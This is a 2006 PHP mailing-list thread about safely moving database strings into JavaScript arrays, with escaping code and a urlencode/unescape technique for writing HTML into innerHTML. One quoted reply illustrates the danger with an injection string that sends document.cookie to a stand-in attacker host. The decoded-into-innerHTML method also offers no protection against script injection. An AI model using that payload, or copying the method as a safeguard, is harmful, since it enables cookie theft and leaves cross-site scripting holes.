NYCPHP Meetup

NYPHP.org

[nycphp-talk] Passing JavaScript arrays

Peter Sawczynec ps at pswebcode.com
Mon Jul 10 14:57:37 EDT 2006 

No, I did not pass these as actual GET or POST data between web pages. This
technique was a jury-rig technique to get strings of HTML and other odd
characters safely into a client-side JavaScript array as follows: 

The data for the JavaScript slideshow array gets pulled from MySQL by PHP,
then with PHP the urlencode($db_data) step ensures that no character element
in the $db_data string (such as single-quote, double-quote, semi-colon or
backslash) gets interpreted by the JavaScript as a command that might throw
an error on the browser page.

Then in the actual JavaScript I found that the combined JavaScript
replace(unescape(<? echo $db_data ?>),'+',' ') nicely undoes the PHP
urlencoding and ensures that when JavaScript pushes a data array string into
the browser innerHTML element the string has a very high-chance of being
cross-browser compatible and the display to the user is pretty.

If this was not your technology issue, then forgive me for sending up this
suggestion.

Peter


-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On
Behalf Of Cliff Hirsch
Sent: Monday, July 10, 2006 8:19 AM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Interesting approach. How big was the array? It seems like this method might
produce unreasonably long URLs if there is extensive data.

-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Peter Sawczynec
Sent: Saturday, July 08, 2006 8:25 AM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Another possible basic technique for the PHP to JavaScript string data
transfer. 

Once upon creating a JavaScripted slideshow that rewrote the innerHTML in
div tags to change images and their complex multi-line descriptions, I found
this ditty worked for dynamically creating the JavaScript array of
image/text/HTML data.

1) In PHP do: urlencode($str_with_HTML_and_special_chars)

2) In the JavaScript do:
replace(unescape($str_with_HTML_and_special_chars),'+',' ')

Has not choked on anything.


Warmest regards,
 
Peter Sawczynec,
Technology Director
PSWebcode
_Design & Interface
_Ecommerce
_Database Management
ps at pswebcode.com
718.796.1951
www.pswebcode.com



-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Cliff Hirsch
Sent: Friday, July 07, 2006 1:47 PM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Thanks to all for the great responses -- very helpful. I've summarized
below:

> For security, do I just escape the output like any other variable
destined for the browser?

It depends where its coming from and what you're using it for. For example,
I have dynamic JS array's coming from the DB that may contain HTML, and will
eventually populate drop-down menu's.  For these, I pass through a 'js
cleansing' routine to trim, remove HTML tags, convert to UTF-8 (or
whatever), remove any line-breaks and escape all quotes. But I'd be
extremely wary if your JS data is coming from GET or POST.  I can see a
variable like the following jacking a JS array:

'); location='http://myevilserver.com/steal?your_cookies='+document.cookie;
//

If you're echoing a string from php into a javascript string var, you need
to escape it. Here's an example. The escapeString function here is slightly
modified from the one used in CakePHP's javascript helper:

<?php
function escapeString($string) {
   $escape = array("\r\n" => '\n', "\r" => '\n', "\n" => '\n', '"' => '\"',
"'" => "\\'");
   return str_replace(array_keys($escape), array_values($escape), $string);
}

$string = "It's good to \"escape\" strings";
?>

<script language="javascript" type="text/javascript">
// <![CDATA[
   var string = '<?php echo escapeString($string); ?>';
   alert(string);
// ]]>
</script>

If you don't want the JS to be inline, you can create a separate PHP file
that only outputs JavaScript code:

<script type="text/javascript" src="js.php"></script>

Just make sure js.php has the following before you start outputting
JavaScript:

header('content-type:text/javascript');

(From what I understand, Apache will by default cache .js files but force a
request for .php templates.  This may affect the chi of your app..  man..)

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php

More information about the talk mailing list